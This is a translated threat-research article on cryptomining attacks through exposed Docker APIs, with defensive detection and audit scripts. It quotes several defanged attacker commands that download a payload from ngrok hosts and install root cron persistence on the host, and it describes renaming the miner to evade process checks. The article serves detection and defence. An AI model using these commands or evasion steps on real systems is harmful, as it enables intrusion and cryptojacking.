How an unauthenticated Docker API and public community images are used to distribute cryptocurrency miners


We analyzed data collected with honeypot containers that we set up to track threats, and found significant activity from unwanted or unauthorized cryptocurrency miners deployed as rogue containers using an image published on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, network and process tools are installed to break into neighbouring exposed containers and applications.

We leave our honeypots as they are, that is, with default settings, without security measures or subsequent installation of additional software. Note that Docker publishes initial-setup recommendations to avoid mistakes and trivial exposure. But the honeypots in question are containers, intended to detect attacks aimed at the container platform, not at the applications running inside the containers.

The malicious activity we found is also notable because it requires no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore exposed, container image is all the attackers need to infect many open servers.

An unprotected Docker API lets a user perform a wide range of commands, including listing running containers, fetching the logs of a specific container, starting and stopping containers (including forced stops), and even creating a new container from a given image with the settings of the caller's choice.

Figure: on the left, the malware delivery method; on the right, the attacker's environment, which allows images to be rolled out remotely.

Figure: distribution by country of the 3762 exposed Docker APIs, based on a Shodan search dated 12.02.2019.

Attack chain and payload options

The malicious activity was not seen only through the honeypots. Shodan data shows that the number of exposed Docker APIs (see the second figure) has grown since we investigated a misconfigured container used as a bridge for deploying Monero mining software. In October of last year (2018; translator's note: current figures can be checked the same way) there were only 856 exposed APIs.

Analysis of the honeypot logs showed that use of the container image was also tied to use of ngrok, a tool for establishing secure connections or forwarding traffic from publicly reachable endpoints to specified addresses or resources (for example localhost). This lets attackers generate URLs on the fly when delivering the payload to an exposed server. Below are excerpts from the logs showing abuse of the ngrok service:

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the dropped files are fetched from constantly changing URLs. These URLs have a short lifetime, so the payload can no longer be downloaded once the tunnel has expired.
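The log excerpts above share a recognisable shape: a payload fetched from an eight-hex-character ngrok host, a cron entry written under some prefix, and a chroot into that same prefix, which only makes sense if the host's root filesystem was bind-mounted there in the container-creation request (an inference from the commands; the excerpts do not show the HostConfig). The following detection routine is an added example, not code from the article or from Trend Micro, and runs over constructed records modelled on those excerpts; the field names mirror the Docker create-request fields seen in the logs.

```python
"""Flag Docker container-creation requests that match the honeypot pattern:
payload pulled over an ephemeral ngrok URL, cron persistence written under a
prefix, and a chroot into that prefix (host root mounted into the container)."""
import re
from typing import Dict, List

# Constructed sample requests (not real log data), shaped like the excerpts above.
# Record 0 mimics the attack; record 1 is a benign container for contrast.
SAMPLE_CREATE_REQUESTS: List[Dict[str, str]] = [
    {
        "Entrypoint": "/bin/sh",
        "Cmd": (
            '-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfile0123456789abcdef0123456789abcdefd '
            '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=0123456789abcdef0123456789abcdef";'
            'echo "* * * * * root sh /tmp/tmpfile0123456789abcdef0123456789abcdefd" >/tmp9bedce/etc/crontab;'
            'echo "* * * * * root sh /tmp/tmpfile0123456789abcdef0123456789abcdefd" >/tmp9bedce/etc/cron.d/1m;'
            'chroot /tmp9bedce sh -c "cron || crond"'
        ),
    },
    {"Entrypoint": "/bin/sh", "Cmd": "-c nginx -g 'daemon off;'"},
]

# ngrok tunnel hosts are 8 hex chars; accept both live and defanged (hxxp, [.]) forms.
NGROK_URL = re.compile(
    r'(?:hxxps?://[0-9a-f]{8}\[\.\]ngrok\[\.\]io|https?://[0-9a-f]{8}\.ngrok\.io)/[^\s";]*'
)
# Redirection into <prefix>/etc/crontab or <prefix>/etc/cron.d/<name>; group 1 is the prefix.
CRON_WRITE = re.compile(r'>\s*(/[^\s;]*?)/etc/(?:crontab|cron\.d/[^\s;]+)')
CHROOT_DIR = re.compile(r'\bchroot\s+(/[^\s;]+)')
# The r= query parameter carries the 32-hex payload identifier (also used as the file name).
PAYLOAD_ID = re.compile(r'[?&]r=([0-9a-f]{32})')


def analyse_cmd(cmd: str) -> Dict[str, object]:
    """Extract indicators from one container command string."""
    cron_prefixes = CRON_WRITE.findall(cmd)
    chroot_dirs = CHROOT_DIR.findall(cmd)
    return {
        "ngrok_urls": NGROK_URL.findall(cmd),
        "payload_ids": PAYLOAD_ID.findall(cmd),
        "cron_prefixes": cron_prefixes,
        "chroot_dirs": chroot_dirs,
        # Writing cron under a prefix and then chroot-ing into the same prefix means the
        # container treats that directory as a mounted host root: persistence on the host.
        "host_persistence": bool(set(cron_prefixes) & set(chroot_dirs)),
    }


def is_suspicious(findings: Dict[str, object]) -> bool:
    """Either indicator alone is enough to escalate the request for review."""
    return bool(findings["host_persistence"] or findings["ngrok_urls"])


def triage(requests: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per suspicious create request, keeping the entrypoint for context."""
    flagged: List[Dict[str, object]] = []
    for req in requests:
        findings = analyse_cmd(req.get("Cmd", ""))
        if is_suspicious(findings):
            findings["entrypoint"] = req.get("Entrypoint")
            flagged.append(findings)
    return flagged


if __name__ == "__main__":
    for finding in triage(SAMPLE_CREATE_REQUESTS):
        print(finding)
```

The same expressions can be applied to dockerd request logs or to an audit trail of `POST /containers/create` bodies; the prefix-equals-chroot check is the strongest single signal, because legitimate workloads have no reason to write cron files into a directory and then chroot into it.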

There are two payload options. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools, which are used to scan network ranges and then look for new targets.

The dropper script sets two variables that are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are hosted, and the RIP variable is the file name (in fact a hash) of the miner to be deployed. The HOST variable changes every time the hash changes. The script also tries to check that no other cryptocurrency miners are already running on the attacked server.

Figure: examples of the HOST and RIP variables, and the code snippet used to check that no other miners are running.

Before it is started, the miner is renamed to nginx. Other versions of this script rename the miner after other legitimate services that may be present on Linux systems. This is usually enough to get past checks that only look at the list of running process names.
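Because the miner is renamed to nginx, a check that only compares process names will miss it. The routine below is an added example, not code from the article, showing the checks that survive renaming: the real path of the executable, whether the file was unlinked after exec, and the command line. The expected nginx paths and the miner argument markers are assumptions for illustration, and the sample process table is constructed; `iter_live_procs` reads /proc for use on a real Linux host.

```python
"""Catch a miner that has been renamed to 'nginx': compare the name ps shows (comm)
against where the executable really lives and how it was invoked."""
import os
from dataclasses import dataclass
from typing import Dict, Iterator, List


@dataclass
class Proc:
    pid: int
    comm: str     # /proc/<pid>/comm: the name ps and pgrep match on
    exe: str      # readlink of /proc/<pid>/exe
    cmdline: str  # /proc/<pid>/cmdline with NULs replaced by spaces


# Assumed: where a legitimately installed nginx binary is expected (distro-dependent).
EXPECTED_EXE = {
    "nginx": {"/usr/sbin/nginx", "/usr/local/sbin/nginx", "/usr/local/nginx/sbin/nginx"},
}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Assumed command-line fragments typical of XMRig-style miners (not from the article).
MINER_MARKERS = ("stratum+tcp://", "stratum+ssl://", "--donate-level", "xmrig")

# Constructed sample: a real nginx, a renamed miner, a renamed miner that also rewrote
# its argv and unlinked its binary, and an unrelated shell.
SAMPLE_PROCS = [
    Proc(812, "nginx", "/usr/sbin/nginx", "nginx: master process /usr/sbin/nginx"),
    Proc(4107, "nginx", "/tmp/nginx", "/tmp/nginx -o stratum+tcp://pool.example:3333 -u 4A..."),
    Proc(4108, "nginx", "/tmp/nginx (deleted)", "nginx"),
    Proc(23, "sh", "/bin/sh", "sh -c cron"),
]


def masquerade_reasons(p: Proc) -> List[str]:
    """Return the reasons a process looks like a renamed miner; empty means clean."""
    reasons: List[str] = []
    real_exe = p.exe.replace(" (deleted)", "")
    if real_exe.startswith(SCRATCH_DIRS):
        reasons.append(f"executable in scratch directory: {real_exe}")
    if p.exe.endswith(" (deleted)"):
        reasons.append("executable unlinked after exec")
    expected = EXPECTED_EXE.get(p.comm)
    if expected is not None and real_exe not in expected:
        reasons.append(f"comm {p.comm!r} does not match binary path {real_exe}")
    if any(marker in p.cmdline for marker in MINER_MARKERS):
        reasons.append("miner-style arguments on the command line")
    return reasons


def scan(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every process with at least one finding."""
    results: Dict[int, List[str]] = {}
    for p in procs:
        reasons = masquerade_reasons(p)
        if reasons:
            results[p.pid] = reasons
    return results


def iter_live_procs() -> Iterator[Proc]:
    """Read real processes from /proc (Linux only); entries we cannot read are skipped."""
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue
        yield Proc(pid, comm, exe, cmdline)


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCS).items():
        print(pid, reasons)
```

Run against `list(iter_live_procs())` as root to see all processes; the exe link and the "(deleted)" suffix are what the dropper's rename cannot hide, so they are worth more than any name-based check.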

The scanning script has its own particularities. It works with the same URL service to fetch the tools it needs. Among them is the zmap binary, used to scan networks and obtain a list of open ports. The script also downloads another binary used to interact with the discovered services and grab their banners, in order to learn more about each discovered service (for example, its version).

The script also predefines some network ranges to scan, though this depends on the script version. It likewise sets the target ports of the services it is looking for, in this case Docker, before running the scan.

As soon as possible targets are found, their banners are grabbed automatically. The script then filters the targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client and Apache CouchDB. If a scanned server matches any of these, it is saved to a text file that the attackers can use later for further analysis and compromise. These text files are uploaded to the attackers' servers through dynamic links; that is, a separate URL is used for each file, which makes subsequent access difficult.

The attack vector is a Docker image, as can be seen in the following two code snippets.

Figure: top, the renaming to a legitimate service; bottom, how zmap is used to scan the network.

Figure: top, the predefined network ranges; bottom, the specific ports used to look for services, including Docker.

Figure: screenshot showing that the alpine-curl image has been pulled more than 10 million times.

A Docker image can be built on Alpine Linux with curl, a resource-efficient CLI tool for transferring files over various protocols. As the previous figure shows, this image has already been pulled more than 10 million times. The large number of pulls may indicate that this image is being used as an entry point; the image was last updated more than six months ago, and users have not pulled other images from this repository nearly as often. In Docker, an entrypoint is the set of instructions used to configure a container so that it runs. If the entrypoint settings are wrong (for example, the container is left exposed to the Internet), the image can be used as an attack vector. Attackers can use it to deliver a payload once they find a misconfigured or exposed container that has been left unattended.

It is important to note that this image (alpine-curl) is not malicious in itself, but as shown above it can be used to perform malicious actions. Similar Docker images can be used for malicious activity in the same way. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a persistent problem for many companies, especially those adopting DevOps and focused on rapid development and delivery. This is aggravated by the need to comply with audit and monitoring requirements, the need to keep data confidential, and the heavy cost of failing to do so. Integrating automated security into the development lifecycle not only helps find security holes that might otherwise go unnoticed, but also reduces unnecessary work, such as running extra software builds for every discovered vulnerability or misconfiguration after an application has been deployed.

The incident discussed in this article highlights the need to pay attention to security from the start, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
  • Follow the recommendations and enable the security mechanisms, for example those from Docker, and the built-in security features.
  • Use automated runtime and image scanning to obtain additional information about the processes running in a container (for example, to detect spoofing or look for vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
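The first recommendation comes down to one setting: a Docker daemon must never expose its API over plain TCP to all interfaces. The audit routine below is an added example, not code from the article or from Docker; it checks a daemon.json (the path /etc/docker/daemon.json and the two embedded configurations are assumed, not taken from the page) and reports a listener on 0.0.0.0 and a TCP listener without client-certificate verification. The key names (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are the daemon's own configuration keys.

```python
"""Audit a Docker daemon.json for an exposed, unauthenticated API listener.
The weak configuration is what the honeypots and the Shodan results describe;
the hardened one binds to one address on 2376 and requires client certificates."""
import json
from typing import List

# Constructed examples of /etc/docker/daemon.json contents (assumed path, not from the article).
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

WILDCARD_HOSTS = {"", "0.0.0.0", "[::]", "::"}  # dockerd treats an empty host as 0.0.0.0


def audit_daemon_config(raw: str) -> List[str]:
    """Return a list of issues; an empty list means no exposed TCP listener was found."""
    cfg = json.loads(raw)
    issues: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    for listener in tcp_hosts:
        host = listener[len("tcp://"):].rsplit(":", 1)[0]
        if host in WILDCARD_HOSTS:
            issues.append(f"{listener}: listens on all interfaces")
        if not cfg.get("tlsverify"):
            # tls alone only encrypts; tlsverify is what rejects clients without a CA-signed cert.
            issues.append(f"{listener}: TCP listener without tlsverify (anyone can call the API)")
    if tcp_hosts and cfg.get("tlsverify"):
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                issues.append(f"tlsverify set but {key} is missing")
    return issues


def audit_file(path: str = "/etc/docker/daemon.json") -> List[str]:
    """Convenience wrapper for a live host; a missing file means no TCP listener is configured here."""
    try:
        with open(path) as fh:
            return audit_daemon_config(fh.read())
    except FileNotFoundError:
        return []


if __name__ == "__main__":
    print("weak:", audit_daemon_config(WEAK_DAEMON_JSON))
    print("hardened:", audit_daemon_config(HARDENED_DAEMON_JSON))
```

Two caveats for a real host: the daemon may also receive its listeners from the `-H` flag in the systemd unit rather than from daemon.json (dockerd refuses to start if both set `hosts`), so check the running process as well; and even the hardened listener should sit behind a firewall rule that limits which sources may reach 2376, since TLS client authentication protects the API but does not hide it from scanners.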

Trend Micro helps DevOps teams build securely, release quickly and launch anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined and automated security across the organization's entire DevOps pipeline and delivers multiple XGen threat defenses to protect physical, virtual and cloud workloads at runtime. It also adds container security with Deep Security and Deep Security Smart Check, which scans Docker container images for malware and vulnerabilities at any point in the development pipeline to block threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker video course, practising speakers show which settings should be made first to reduce the likelihood of, or avoid entirely, the situation described above. And on August 19-21, at the DevOps Tools & Cheats online intensive, you can discuss these and similar security problems with colleagues and practising instructors at a round table, where everyone can speak up and hear about the pains and successes of experienced peers.

Source: www.habr.com
